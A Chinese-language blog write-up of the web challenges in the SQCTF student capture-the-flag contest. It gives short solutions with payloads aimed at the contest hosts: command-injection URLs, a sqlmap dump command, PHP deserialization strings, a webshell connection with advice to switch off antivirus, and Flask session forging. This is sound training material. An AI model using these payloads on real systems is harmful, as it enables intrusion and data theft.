<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>商丘新生赛SQctf | workwork</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>商丘新生赛SQctf</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2025-04-14T13:50:30.000Z" id="date"> 2025-04-14</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2025-04-14T13:51:30.395Z" id="updated"> 2025-04-14</time></div></span></div></div><hr><div id="post-content"><p> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/ljnljn/p/18823582">商丘师范学院第四届网络安全及信息对抗大赛SQCTF（校外赛）WP</a></p>
<p>题目出的挺好的，有梯度而且各类知识点都有，最后也是做了42道，虽然只有193名，大佬特别多，但是感觉自己还蛮厉害的（</p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="1、RceMe"><a href="#1、RceMe" class="headerlink" title="1、RceMe"></a>1、RceMe</h2><p>shellcode</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/?com=<span class="hljs-built_in">nl</span>%20/*<br></code></pre></td></tr></table></figure>

<h2 id="2、ezGame"><a href="#2、ezGame" class="headerlink" title="2、ezGame"></a>2、ezGame</h2><p>发现一个obj</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191158206-153974658.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191158206-153974658.png" alt="image"></p>
<p>因此用obj.score改分数</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191202312-1922143566.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191202312-1922143566.png" alt="image"></p>
<p>玩输了之后获得flag</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191206337-231893235.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191206337-231893235.png" alt="image"></p>
<h2 id="3、Ping"><a href="#3、Ping" class="headerlink" title="3、Ping"></a>3、Ping</h2><p>用管道符发现能执行命令</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191210983-803900900.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191210983-803900900.png" alt="image"></p>
<p>用1同样的方法获得flag</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191215931-1126226397.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191215931-1126226397.png" alt="image"></p>
<h2 id="4、商师一日游"><a href="#4、商师一日游" class="headerlink" title="4、商师一日游"></a>4、商师一日游</h2><p>第一关：源代码</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191219992-860160451.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191219992-860160451.png" alt="image"></p>
<p>第二关：Cookie</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191223951-1354666064.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191223951-1354666064.png" alt="image"></p>
<p>第三关：请求头</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191228565-1592191441.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191228565-1592191441.png" alt="image"></p>
<p>第四关：robots.txt</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191234162-379114448.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191234162-379114448.png" alt="image"></p>
<p>第五关：</p>
<p>shellcode:<code>?hhh=php%0Aflag</code></p>
<p>第六关：去掉disabled</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191239079-548607046.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191239079-548607046.png" alt="image"></p>
<p>第七关：shell</p>
<p>蚁剑连接</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191242862-1713953650.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191242862-1713953650.png" alt="image"></p>
<p>这里记得把杀毒软件关掉</p>
<p>获得最后一块</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191247331-1403841158.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191247331-1403841158.png" alt="image"></p>
<h2 id="5、小小查询系统"><a href="#5、小小查询系统" class="headerlink" title="5、小小查询系统"></a>5、小小查询系统</h2><p>sqlmap秒了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap -u http://challenge.qsnctf.com:30561/?<span class="hljs-built_in">id</span>=1 -a<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191253288-1817227.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191253288-1817227.png" alt="image"></p>
<p>6、大大大黑塔</p>
<p>bv号</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/challenge.qsnctf.com:30641/</span><span class="hljs-string">?S</span>QNU=<span class="hljs-title class_">BV1tXckehEd30641</span><br></code></pre></td></tr></table></figure>

<p>随后反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Secret</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$key</span>;<br>&#125;<br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Secret</span>();<br><span class="hljs-variable">$obj</span>-&gt;key = <span class="hljs-string">&quot;SQCTF&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$obj</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>发送</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191258938-2040413222.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191258938-2040413222.png" alt="image"></p>
<h2 id="6、Input-a-number"><a href="#6、Input-a-number" class="headerlink" title="6、Input a number"></a>6、Input a number</h2><p>intval($num,0)函数是多进制判断，尝试了一下用八进制可以</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191305303-971920395.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191305303-971920395.png" alt="image"></p>
<h2 id="7、Ez-calculate"><a href="#7、Ez-calculate" class="headerlink" title="7、Ez_calculate"></a>7、Ez_calculate</h2><p>ai写的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> bs4 <span class="hljs-keyword">import</span> BeautifulSoup<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> time<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">solve_math_challenge</span>(<span class="hljs-params">url</span>):<br>    <span class="hljs-comment"># 创建会话保持连接</span><br>    session = requests.Session()<br><br>    <span class="hljs-comment"># 第一次请求获取挑战页面</span><br>    start_time = time.time()<br>    get_response = session.get(url)<br><br>    <span class="hljs-comment"># 解析表达式</span><br>    soup = BeautifulSoup(get_response.text, <span class="hljs-string">&#x27;html.parser&#x27;</span>)<br>    challenge = soup.find(<span class="hljs-string">&#x27;div&#x27;</span>, class_=<span class="hljs-string">&#x27;challenge&#x27;</span>).text.strip()<br><br>    <span class="hljs-comment"># 清理非计算字符（保留数字和运算符）</span><br>    clean_expr = re.sub(<span class="hljs-string">r&#x27;[^\d+\-*/()]&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, challenge)<br><br>    <span class="hljs-comment"># 安全计算表达式</span><br>    <span class="hljs-keyword">try</span>:<br>        result = <span class="hljs-built_in">eval</span>(clean_expr)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">raise</span> ValueError(<span class="hljs-string">f&quot;表达式解析失败: <span class="hljs-subst">&#123;clean_expr&#125;</span>&quot;</span>)<br><br>    <span class="hljs-comment"># 构造提交数据（模拟浏览器表单）</span><br>    post_data = &#123;<br>        <span class="hljs-string">&#x27;value&#x27;</span>: <span class="hljs-built_in">int</span>(result)  <span class="hljs-comment"># 强制转换为整数匹配输入框类型</span><br>    &#125;<br><br>    <span class="hljs-comment"># 计算请求耗时（模拟人类速度）</span><br>    request_delay = time.time() - start_time<br>    remaining_time = <span class="hljs-built_in">max</span>(<span class="hljs-number">0</span>, <span class="hljs-number">2.0</span> - request_delay)  <span class="hljs-comment"># 2秒时间限制</span><br><br>    <span class="hljs-comment"># 提交答案（带随机延迟）</span><br>    time.sleep(remaining_time * <span class="hljs-number">0.7</span>)  <span class="hljs-comment"># 保留0.6秒余量</span><br>    post_response = session.post(url, data=post_data)<br><br>    <span class="hljs-keyword">return</span> post_response.text<br><br><br><span class="hljs-comment"># 使用示例</span><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    target_url = <span class="hljs-string">&quot;http://challenge.qsnctf.com:31273/&quot;</span><br>    <span class="hljs-built_in">print</span>(solve_math_challenge(target_url))<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191315683-1169666859.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191315683-1169666859.png" alt="image"></p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191318554-1345976264.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191318554-1345976264.png" alt="image"></p>
<h2 id="8、My-Blog"><a href="#8、My-Blog" class="headerlink" title="8、My Blog"></a>8、My Blog</h2><p>点github获得账号密码</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191322983-410584750.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191322983-410584750.png" alt="image"></p>
<p>dirsearch获得login.php</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191326688-783191157.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191326688-783191157.png" alt="image"></p>
<p>输入账号密码获得flag</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191332017-657740249.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191332017-657740249.png" alt="image"></p>
<h2 id="9、baby-rce"><a href="#9、baby-rce" class="headerlink" title="9、baby rce"></a>9、baby rce</h2><p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191338892-284826250.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191338892-284826250.png" alt="image"></p>
<h2 id="10、eeaassyy"><a href="#10、eeaassyy" class="headerlink" title="10、eeaassyy"></a>10、eeaassyy</h2><p>直接开开发人员工具</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191342984-2093165891.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191342984-2093165891.png" alt="image"></p>
<h2 id="11、逃"><a href="#11、逃" class="headerlink" title="11、逃"></a>11、逃</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby">/<span class="hljs-string">?p</span>ayload=<span class="hljs-symbol">O:</span><span class="hljs-number">4</span><span class="hljs-symbol">:<span class="hljs-string">&quot;test&quot;</span></span><span class="hljs-symbol">:</span><span class="hljs-number">2</span><span class="hljs-symbol">:</span>&#123;<span class="hljs-symbol">s:</span><span class="hljs-number">4</span><span class="hljs-symbol">:<span class="hljs-string">&quot;user&quot;</span></span>;<span class="hljs-symbol">s:</span><span class="hljs-number">4</span><span class="hljs-symbol">:<span class="hljs-string">&quot;test&quot;</span></span>;<span class="hljs-symbol">s:</span><span class="hljs-number">4</span><span class="hljs-symbol">:<span class="hljs-string">&quot;pswd&quot;</span></span>;<span class="hljs-symbol">s:</span><span class="hljs-number">8</span><span class="hljs-symbol">:<span class="hljs-string">&quot;escaping&quot;</span></span>;&#125;<br></code></pre></td></tr></table></figure>

<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191348260-238056743.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191348260-238056743.png" alt="image"></p>
<h2 id="12、flask-unsign"><a href="#12、flask-unsign" class="headerlink" title="12、flask-unsign"></a>12、flask-unsign</h2><p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191354116-749788650.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191354116-749788650.png" alt="image"></p>
<p>随后输入cookie：session&#x3D;</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191358314-102654236.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191358314-102654236.png" alt="image"></p>
<p>导航到&#x2F;admin获得flag</p>
<p class='item-img' data-src='https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191402249-1588982034.png'><img src="https://img2024.cnblogs.com/blog/3539156/202504/3539156-20250413191402249-1588982034.png" alt="image"></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/04/01/%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88SQL%E6%B3%A8%E4%B8%80%E4%B8%8B/">这是什么SQL注一下 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">heyi404</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81RceMe"><span class="toc-number">1.1.</span> <span class="toc-text">1、RceMe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81ezGame"><span class="toc-number">1.2.</span> <span class="toc-text">2、ezGame</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81Ping"><span class="toc-number">1.3.</span> <span class="toc-text">3、Ping</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E5%95%86%E5%B8%88%E4%B8%80%E6%97%A5%E6%B8%B8"><span class="toc-number">1.4.</span> <span class="toc-text">4、商师一日游</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81%E5%B0%8F%E5%B0%8F%E6%9F%A5%E8%AF%A2%E7%B3%BB%E7%BB%9F"><span class="toc-number">1.5.</span> <span class="toc-text">5、小小查询系统</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81Input-a-number"><span class="toc-number">1.6.</span> <span class="toc-text">6、Input a number</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81Ez-calculate"><span class="toc-number">1.7.</span> <span class="toc-text">7、Ez_calculate</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8%E3%80%81My-Blog"><span class="toc-number">1.8.</span> <span class="toc-text">8、My Blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9%E3%80%81baby-rce"><span class="toc-number">1.9.</span> <span class="toc-text">9、baby rce</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10%E3%80%81eeaassyy"><span class="toc-number">1.10.</span> <span class="toc-text">10、eeaassyy</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11%E3%80%81%E9%80%83"><span class="toc-number">1.11.</span> <span class="toc-text">11、逃</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12%E3%80%81flask-unsign"><span class="toc-number">1.12.</span> <span class="toc-text">12、flask-unsign</span></a></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>